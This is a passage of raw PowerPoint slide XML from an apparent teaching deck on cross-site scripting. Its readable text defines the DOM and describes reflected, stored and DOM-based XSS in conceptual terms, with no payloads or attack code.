              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>injected</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="object 60"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2484967" y="2078567"/>
            <a:ext cx="7205133" cy="2700867"/>
            <a:chOff x="1863725" y="1558925"/>
            <a:chExt cx="5403850" cy="2025650"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="61" name="object 61"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId15" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1898649" y="1593850"/>
              <a:ext cx="5346699" cy="1968499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 62"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1878012" y="1573212"/>
              <a:ext cx="5375275" cy="1997075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5375275" h="1997075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5375275" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5375275" y="1997075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1997075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="131821"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="object 63"/>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
            <a:ext cx="10248053" cy="6130803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="541867" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="509681" algn="ctr">
              <a:spcBef>
                <a:spcPts val="4267"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Three</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Types</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="3007"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" spc="-53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Stored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DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vector</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>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solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Reflected</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘reflected’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DADADA"/>
                </a:solidFill>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b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>0: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Based</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="53" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>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4" name="object 4"/>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6" name="object 6"/>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8" name="object 8"/>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6728-77B7-1FC5-DE01-DBB8EBEB081B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t>Type 0: Dom Based XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-PK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF31C1EA-AB1F-24B7-519E-5092E202F886}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>DOM-Based XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>, also referred to as Type-0 XSS, is a type of Cross-Site Scripting vulnerability that occurs when the Document Object Model (DOM) of a web page is manipulated on the client side in an unsafe manner. Unlike traditional XSS, this attack happens entirely within the browser, without involving the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>What is the DOM?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>DOM (Document Object Model)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a structured representation of a web page's content that allows JavaScript to dynamically access and modify the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3937051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DF79E-3BC1-AEAA-E77D-98404DF5A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04CCA-DB71-20DC-EC1F-F08245C0BCB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44C569A-022D-0D97-21DF-672443BDD6A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In DOM-based XSS, the malicious input provided by an attacker is processed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>entirely by the browser’s JavaScript engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. It occurs when:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A JavaScript function in the web page retrieves user input (e.g., from the URL, cookies, or local storage).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   The input is inserted into the DOM without proper validation or sanitization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This allows the attacker to inject malicious scripts that run in the victim's browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
